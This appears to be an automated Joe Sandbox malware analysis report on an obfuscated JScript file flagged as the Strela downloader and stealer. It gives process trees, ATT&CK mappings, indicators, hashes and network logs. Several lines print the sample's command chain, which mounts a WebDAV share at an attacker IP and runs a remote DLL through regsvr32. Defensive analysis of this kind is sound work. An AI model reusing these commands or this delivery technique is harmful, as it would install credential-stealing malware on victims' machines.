Source: C:\Windows\System32\wscript.exe. Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

              Data Obfuscation

Source: C:\Windows\System32\wscript.exe. Anti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")
Source: C:\Windows\System32\cmd.exe. Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_0224B68A push esp; iretd (11_2_0224B691)
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_0224EEFE push ecx; retf 003Fh (11_2_0224EF5E)

              Hooking and other Techniques for Hiding and Protection

Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 8888
Source: unknown | Network traffic detected: HTTP traffic on port 8888 -> 49709
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\net.exe TID: 4268 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: net.exe, 00000005.00000003.2049998000.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: net.exe, 00000005.00000002.2130413282.00000178B0F08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWpW
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\regsvr32.exe | Code function: CreateThread,GetLocaleInfoA, 11_2_02209A30
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

Source: Yara match | File source: 11.2.regsvr32.exe.7ff8b7e00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2209539224.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5640, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\regsvr32.exe | File opened: \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\regsvr32.exe | File opened: \\193.143.1.231@8888\davwwwroot\140341625623863.dll

              Remote Access Functionality

Source: Yara match | File source: 11.2.regsvr32.exe.7ff8b7e00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2209539224.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5640, type: MEMORYSTR

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 12 Scripting | Valid Accounts | Windows Management Instrumentation | 12 Scripting | 11 Process Injection | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 2 Network Share Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Regsvr32 | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | 11 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1576785 | Sample: 126484723232027823.js | Start date: 17/12/2024 | Architecture: WINDOWS | Score: 84
Sample-level signatures: Yara detected Strela Downloader; Yara detected Strela Stealer; Uses known network protocols on non-standard ports; Sigma detected: WScript or CScript Dropper
• wscript.exe (started) - signatures: JScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage); Gathers information about network shares
  • cmd.exe (started) - signatures: Gathers information about network shares
    • cmd.exe (started) - signatures: Gathers information about network shares
      • net.exe (started) -> 193.143.1.231, ports 49704, 49705, 49706 (BITWEB-ASRU, unknown)
    • cmd.exe (started)
      • regsvr32.exe (started) - signatures: Opens network shares
    • conhost.exe (started)

Source | Detection | Scanner | Label | Link
126484723232027823.js | 0% | ReversingLabs | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://193.143.1.231:8888/%=1 | 0% | Avira URL Cloud | safe |
http://193.143.1.231:8888// | 0% | Avira URL Cloud | safe |
http://193.143.1.231/ | 0% | Avira URL Cloud | safe |
http://193.143.1.231:8888/ | 0% | Avira URL Cloud | safe |
http://193.143.1.231:8888/-=9 | 0% | Avira URL Cloud | safe |
http://193.143.1.231:8888/y=M | 0% | Avira URL Cloud | safe |
              No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://193.143.1.231:8888/%=1 | net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.143.1.231/ | net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.143.1.231:8888/ | net.exe, 00000005.00000002.2130413282.00000178B0F95000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2049998000.00000178B0F5D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.143.1.231:8888/-=9 | net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.143.1.231:8888/y=M | net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://193.143.1.231:8888// | net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
193.143.1.231 | unknown | unknown | | 57271 | BITWEB-ASRU | true
              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1576785
              Start date and time:2024-12-17 15:15:11 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 26s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Without Instrumentation
Number of new started processes analysed:13
              Number of new started drivers analysed:1
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:126484723232027823.js
              Detection:MAL
              Classification:mal84.rans.troj.spyw.evad.winJS@12/0@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 71%
              • Number of executed functions: 3
              • Number of non-executed functions: 11
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: 126484723232027823.js
Time | Type | Description
09:16:02 | API Interceptor | 1x Sleep call for process: net.exe modified
              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
BITWEB-ASRU | new.bat | malicious | Unknown | 193.143.1.46
BITWEB-ASRU | qL619hzCfc.bat | malicious | Unknown | 193.143.1.46
BITWEB-ASRU | new.bat | malicious | Unknown | 193.143.1.46
BITWEB-ASRU | https://cgd-assinar.com | malicious | Unknown | 193.143.1.14
BITWEB-ASRU | 11iEly4m6C.bat | malicious | Unknown | 193.143.1.46
BITWEB-ASRU | YnViC5yHLu.bat | malicious | Unknown | 193.143.1.46
BITWEB-ASRU | new.bat | malicious | Unknown | 193.143.1.46
BITWEB-ASRU | https://cmd-autenticacaogov.com/ | malicious | Unknown | 193.143.1.14
BITWEB-ASRU | mipsel.nn.elf | malicious | Mirai, Okiru | 193.143.1.70
              No context
              No created / dropped files found
              File type:ASCII text, with very long lines (11695), with no line terminators
              Entropy (8bit):4.75000181394305
              TrID:
                File name:126484723232027823.js
                File size:11'695 bytes
                MD5:09024cb4c452f96fe5b6045e198092ba
                SHA1:53f924039e79576a5b2e9b90e3c11c1116e933eb
                SHA256:0ff304716b215d4fadbf9fee1be5d717c454a09f6bdbe6e42e29995d969964e8
                SHA512:5e0146dc0e358a0a78964abceb2cf735fd1c7d9e0efaae05a0ad39d441c5329a88f0ff28ce5a6171690963398eb4884219db77e66316348b38f2a979dcb4b494
                SSDEEP:192:JxTxIOSN8HHdiTp9JRSSZxSSGSSZxSSf1OSSB5SS3uVX+++QZPP/RvOSSZxSS5nK:P1y1uVIuuVOhpD
                TLSH:6832BF9DB6E4F44818FE9100336291106DA6747E7F32CB2DB3EE998866443F59ED703A
                File Content Preview:function ftewq(){this[hfgkhke+iqkshjqkp+conprmvk+mwncmi](gebyyu+eoztg+jqskgadc+jvaxx+xqqrniwzz+zxqbq+qtwic+cblmmvh+cblmmvh+iqkshjqkp+acrinokm+qtwic+gebyyu+conprmvk+djwmv+ktqhqp+djwmv+woscoo+acrinokm+gbeabu+cblmmvh+oindqeulx+zxqbq+jvaxx+ktqhqp+qxdyfx+jqskg
                Icon Hash:68d69b8bb6aa9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 15:16:02.208988905 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:02.328965902 CET | 8888 | 49704 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:02.329051971 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:02.329371929 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:02.448918104 CET | 8888 | 49704 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:03.748127937 CET | 8888 | 49704 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:03.792522907 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:06.952980042 CET | 49705 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:07.074276924 CET | 8888 | 49705 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:07.074402094 CET | 49705 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:07.084291935 CET | 49705 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:07.204433918 CET | 8888 | 49705 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:08.539954901 CET | 8888 | 49705 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:08.589358091 CET | 49705 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:08.655817986 CET | 49706 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:08.777126074 CET | 8888 | 49706 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:08.777216911 CET | 49706 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:08.777369976 CET | 49706 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:08.896972895 CET | 8888 | 49706 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:10.208786011 CET | 8888 | 49706 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:10.218274117 CET | 49707 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:10.261400938 CET | 49706 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:10.338135958 CET | 8888 | 49707 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:10.338377953 CET | 49707 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:10.338555098 CET | 49707 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:10.458251953 CET | 8888 | 49707 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:11.761334896 CET | 8888 | 49707 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:11.808101892 CET | 49707 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:11.817745924 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:11.880009890 CET | 49708 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:11.999758959 CET | 8888 | 49708 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:11.999993086 CET | 49708 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:12.000483036 CET | 49708 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:12.119921923 CET | 8888 | 49708 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:13.427613974 CET | 8888 | 49708 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:13.434827089 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:13.480017900 CET | 49708 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:13.555481911 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:13.555691957 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:13.555913925 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:13.676049948 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.979101896 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.979301929 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.979361057 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.979506016 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:14.980051041 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.980086088 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.980123997 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:14.980694056 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.980727911 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.980757952 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:14.981395006 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.981430054 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.981457949 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:14.981519938 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:14.981575966 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.099153996 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.099399090 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.099581003 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.103607893 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.151900053 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.170952082 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.171065092 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.171226025 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.173367023 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.173557043 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.173641920 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.181876898 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.182054996 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.182337046 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.190294981 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.190514088 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.190637112 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.198828936 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.199023962 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.199239969 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.207220078 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.207393885 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.207468987 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.215701103 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.215847015 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.216002941 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.224247932 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.224282980 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.224442005 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.232573032 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.232775927 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.232960939 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.241000891 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.241202116 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.241468906 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.271667004 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.272130966 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.272346973 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.290894985 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.291054010 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.291228056 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.363190889 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.363226891 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.363658905 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.365398884 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.365545988 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.365921021 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.370235920 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.370269060 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.370517969 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.374773979 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.374965906 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.375030994 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.379539967 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.379723072 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.379785061 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.384591103 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.384907007 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.384990931 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.388989925 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.389180899 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.389244080 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.394881964 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.395113945 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.395176888 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.398488045 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.398668051 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.398727894 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.403260946 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.403458118 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.403527021 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.407926083 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.408109903 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.408271074 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.412652016 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.412847042 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.412909985 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.417453051 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.417735100 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.417807102 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.422146082 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.422291040 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.422363043 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.426055908 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.426222086 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.426284075 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.429820061 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.429963112 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.430121899 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.433557034 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.433787107 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.433898926 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.437458038 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.437666893 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
Dec 17, 2024 15:16:15.437820911 CET | 49709 | 8888 | 192.168.2.5 | 193.143.1.231
Dec 17, 2024 15:16:15.441395044 CET | 8888 | 49709 | 193.143.1.231 | 192.168.2.5
